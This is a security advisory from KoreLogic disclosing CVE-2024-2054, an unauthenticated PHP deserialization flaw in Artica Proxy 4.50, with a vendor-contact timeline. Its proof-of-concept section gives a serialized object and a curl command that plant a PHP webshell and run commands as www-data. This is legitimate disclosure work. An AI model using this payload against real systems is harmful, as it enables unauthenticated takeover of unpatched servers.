-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

KL-001-2024-002: Artica Proxy Unauthenticated PHP Deserialization Vulnerability

Title: Artica Proxy Unauthenticated PHP Deserialization Vulnerability
Advisory ID: KL-001-2024-002
Publication Date: 2024.03.05
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-002.txt


1. Vulnerability Details

     Affected Vendor: Artica
     Affected Product: Artica Proxy
     Affected Version: 4.50
     Platform: Debian 10 LTS
     CWE Classification: CWE-502 Deserialization of Untrusted Data
     CVE ID: CVE-2024-2054


2. Vulnerability Description

     The Artica Proxy administrative web application will deserialize
     arbitrary PHP objects supplied by unauthenticated users and
     subsequently enable code execution as the "www-data" user.


3. Technical Description

     Prior to authentication, a user can send an HTTP request
     to the "/wizard/wiz.wizard.progress.php" endpoint. This
     endpoint processes the "build-js" query parameter by base64
     decoding the provided value and then calling the "unserialize"
     PHP function with the decoded value as input.

     Code snippet from "wiz.wizard.progress.php":

       if(isset($_GET["build-js"])){buildjs();exit;} 
       ...
       $ARRAY=unserialize(base64_decode($_GET["build-js"]));

     To exploit this vulnerability, a user can leverage the
     installed "Net_DNS2" library autoloader to instantiate the
     "Net_DNS2_Cache_File" class. The "__destruct" method
     within this class will write to arbitrary files defined
     by the class:

       public function __destruct()
       {
           //
           // if there's no cache file set, then there's nothing to do
           //
           if (strlen($this->cache_file) == 0) {
               return;
           }
  
           //
           // open the file for reading/writing
           //
           $fp = fopen($this->cache_file, 'a+');
           if ($fp !== false) {
           ...
           if (!is_null($data)) {
  
               //
               // write the file contents
               //
               fwrite($fp, $data);
           }

     An unauthenticated user can overwrite existing files and 
     insert a webshell to execute malicious PHP as the "www-data"
     user.


4. Mitigation and Remediation Recommendation

     No response from vendor. This vulnerability can be remediated
     by deleting the 'usr/share/artica-postfix/wizard' directory
     if it is not needed. Otherwise, move it to a location outside
     of the web root.


5. Credit

     This vulnerability was discovered by Jaggar Henry of KoreLogic,
     Inc.


6. Disclosure Timeline

     2023.12.18 - KoreLogic requests vulnerability contact and
                  secure communication method from Artica.
     2023.12.18 - Artica Support issues automated ticket #1703011342
                  promising follow-up from a human.
     2024.01.10 - KoreLogic again requests vulnerability contact and
                  secure communication method from Artica.
     2024.01.10 - KoreLogic mail daemon receives SMTP 554 5.7.1 from
                  mail.articatech.com with response
                  "Client host rejected: Go Away!"
     2024.01.11 - KoreLogic requests vulnerability contact and
                  secure communication method via
                  https://www.articatech.com/ 'Contact Us' web form.
     2024.01.23 - KoreLogic requests CVE from MITRE.
     2024.01.23 - MITRE issues automated ticket #1591692 promising
                  follow-up from a human.
     2024.02.01 - 30 business days have elapsed since KoreLogic
                  attempted to contact the vendor.
     2024.02.06 - KoreLogic requests update on CVE from MITRE.
     2024.02.15 - KoreLogic requests update on CVE from MITRE.
     2024.02.22 - KoreLogic reaches out to alternate CNA for
                  CVE identifiers.
     2024.02.26 - 45 business days have elapsed since KoreLogic
                  attempted to contact the vendor.
     2024.02.29 - Vulnerability details presented to AHA!
                  (takeonme.org) by proxy.
     2024.03.01 - AHA! issues CVE-2024-2054 to track this
                  vulnerability.
     2024.03.05 - KoreLogic public disclosure.


7. Proof of Concept

     To overwrite the "wiz.upload.php" file to contain a PHP
     webshell, the following serialized object can be base64
     encoded and submitted via the "build-js" query parameter:

       O:19:"Net_DNS2_Cache_File":4:{s:10:"cache_file";s:47:"/usr/share/artica-postfix/wizard/wiz.upload.php";s:16:"cache_serializer";s:4:"json";s:10:"cache_size";i:9999999999;s:10:"cache_data";a:1:{s:30:"<?php system($_GET['cmd']); ?>";a:2:{s:10:"cache_date";i:0;s:3:"ttl";i:9999999999;}}}

       $ ARTICA_URL="https://127.0.0.1:9000"; PAYLOAD_CMD="id"; curl -k "$ARTICA_URL/wizard/wiz.wizard.progress.php?build-js=TzoxOToiTmV0X0ROUzJfQ2FjaGVfRmlsZSI6NDp7czoxMDoiY2FjaGVfZmlsZSI7czo0NzoiL3Vzci9zaGFyZS9hcnRpY2EtcG9zdGZpeC93aXphcmQvd2l6LnVwbG9hZC5waHAiO3M6MTY6ImNhY2hlX3NlcmlhbGl6ZXIiO3M6NDoianNvbiI7czoxMDoiY2FjaGVfc2l6ZSI7aTo5OTk5OTk5OTk5O3M6MTA6ImNhY2hlX2RhdGEiO2E6MTp7czozMDoiPD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8%2bIjthOjI6e3M6MTA6ImNhY2hlX2RhdGUiO2k6MDtzOjM6InR0bCI7aTo5OTk5OTk5OTk5O319fQ%3d%3d" && curl -k "$ARTICA_URL/wizard/wiz.upload.php?cmd=$PAYLOAD_CMD";

     {"uid=33(www-data) gid=33(www-data) groups=33(www-data)
      ":{"cache_date":1696883506,"ttl":8303116493}}


The contents of this advisory are copyright(c) 2024
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt
-----BEGIN PGP SIGNATURE-----

iQJOBAEBCAA4FiEEB12WYZwbVwYTJ/b2DKLsCTlWkekFAmXnYEgaHGRpc2Nsb3N1
cmVzQGtvcmVsb2dpYy5jb20ACgkQDKLsCTlWken0Ww//ToIHEPjufFZJlET95aB+
da22vMbtlgOrz2+IoA4zoVY7j+U/Q2bxCNyuGUPKy6JxUp2feB5V5/gaPoChtv5N
EyRZM9eqC1yNMjkIfVfiYKSuDhSodasFfzNPsPLUdZ6kRysqbcoZeSl2ZKRjaV3x
gPWZPfbVj23gXpyfYfCXY8OfPzwo6RtWaxibUjD4irtQc98+XajBJpaTqspNy/pc
UuxAeZgtLKIS/7Byh8XatlMgan68iTrbp+TPWs+LH1xfipsZlooqdncAbH7DAzIZ
nB9e7AEVObyZxWeltKTb/gK6OfUNaRj1JTusuYA7JYvLa0+CuZW/MYar1bhUEYGc
vuBiMWuBNXRhxQdVDob0Gov4IqHxGXT9HJyuJLa9W408JKMI3Vg6QLNInv9QiBkN
FPMVVMmPFO4knciobwLOroBs2UCs4JvOPyVwI/Twnwspu5gWeeCbC54SNFYuhXas
25AFoqJzQ12SfEBZGwklX+/4dUuQwLE4zvaM8EbdmLKOS/mg+I5iSYPhWS/PQntr
BzJU0f1hwWoHLj9r9SD65lCvzqLRzJKhv8YibNo4TwwpsQjORvN3QG/N9zP4aApx
whMjdQhwEqUMCbT9jnTK2M4c8v8Z3BQCl3eOb5MClhazYQTZg3oXhW0N+4mXXRGs
j3W055bxbibapxqysBGKiFM=
=fOf5
-----END PGP SIGNATURE-----